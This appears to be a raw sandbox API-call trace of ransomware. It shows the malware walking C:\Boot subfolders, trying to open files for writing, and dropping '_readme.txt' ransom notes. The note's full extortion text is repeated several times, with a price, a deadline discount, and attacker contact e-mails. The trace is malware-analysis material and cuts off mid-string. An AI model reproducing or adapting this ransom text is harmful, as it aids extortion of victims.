| out: hHeap=0xcd0000) returned 1 [0165.977] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.977] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.977] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.977] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.977] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.977] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.977] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.977] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.977] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.977] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.977] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.977] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.977] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.977] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.977] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.977] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.977] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.977] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.977] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.977] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.977] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.977] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.977] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.977] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.977] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.977] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.977] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.977] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.977] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.977] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.977] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.977] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.977] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.978] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.978] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.978] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.978] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.978] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.978] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.978] PathFindFileNameW (pszPath="C:\\Boot\\it-IT\\") returned="it-IT\\" [0165.978] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.978] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.978] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0165.978] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.978] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0165.978] PathFindFileNameW (pszPath="") returned="" [0165.978] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.978] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0165.978] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0165.978] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x800) returned 0x3b40090 [0165.979] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b40090 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0165.979] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x810) returned 0x3b19ec8 [0165.979] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.979] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.979] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0165.979] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.979] FreeLibrary (hLibModule=0x759d0000) returned 1 [0165.979] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.979] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.979] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c638 | out: hHeap=0xcd0000) returned 1 [0165.979] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0165.979] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x81c) returned 0x3b19ec8 [0165.979] PathAppendW (in: pszPath="C:\\Boot\\it-IT\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\it-IT\\_readme.txt") returned 1 [0165.979] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.979] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c638 | out: hHeap=0xcd0000) returned 1 [0165.979] PathFileExistsW (pszPath="C:\\Boot\\it-IT\\_readme.txt") returned 0 [0165.979] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x7d00) returned 0x3b47e70 [0165.979] lstrcpyW (in: lpString1=0x3b47e70, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" [0165.979] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde", lpString2="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" [0165.979] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b1a750 [0165.979] CreateFileW (lpFileName="C:\\Boot\\it-IT\\_readme.txt" (normalized: "c:\\boot\\it-it\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0165.980] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b1a750 | out: hHeap=0xcd0000) returned 1 [0165.980] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b47e70 | out: hHeap=0xcd0000) returned 1 [0165.980] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.980] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0165.980] FindFirstFileW (in: lpFileName="C:\\Boot\\it-IT\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0165.980] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c638 | out: hHeap=0xcd0000) returned 1 [0165.980] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.980] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0165.980] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0165.980] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b44f60 [0165.980] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c638 | out: hHeap=0xcd0000) returned 1 [0165.980] PathFindExtensionW (pszPath="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned=".mui" [0165.980] CreateFileW (lpFileName="C:\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0165.980] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44f60 | out: hHeap=0xcd0000) returned 1 [0165.980] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0165.981] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0165.981] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.981] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c908 | out: hHeap=0xcd0000) returned 1 [0165.981] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0165.981] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c908 [0165.981] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.981] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0165.981] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.981] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.981] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c638 | out: hHeap=0xcd0000) returned 1 [0165.981] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0165.981] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.981] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.981] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c638 | out: hHeap=0xcd0000) returned 1 [0165.981] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0165.981] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.981] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.981] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c638 | out: hHeap=0xcd0000) returned 1 [0165.981] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0165.981] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.981] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.981] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c638 | out: hHeap=0xcd0000) returned 1 [0165.981] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0165.981] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.981] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.981] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c638 | out: hHeap=0xcd0000) returned 1 [0165.981] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0165.981] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.981] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.982] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c638 | out: hHeap=0xcd0000) returned 1 [0165.982] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0165.982] PathFindFileNameW (pszPath="C:\\Boot\\ja-JP\\") returned="ja-JP\\" [0165.982] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0165.982] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.982] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0165.982] PathFindFileNameW (pszPath="") returned="" [0165.982] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0165.983] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0165.983] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b40090 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0165.983] FreeLibrary (hLibModule=0x759d0000) returned 1 [0165.983] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c638 | out: hHeap=0xcd0000) returned 1 [0165.983] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.983] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.983] PathAppendW (in: pszPath="C:\\Boot\\ja-JP\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\ja-JP\\_readme.txt") returned 1 [0165.983] PathFileExistsW (pszPath="C:\\Boot\\ja-JP\\_readme.txt") returned 0 [0165.983] lstrcpyW (in: lpString1=0x3b47e70, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" [0165.983] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde", lpString2="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our 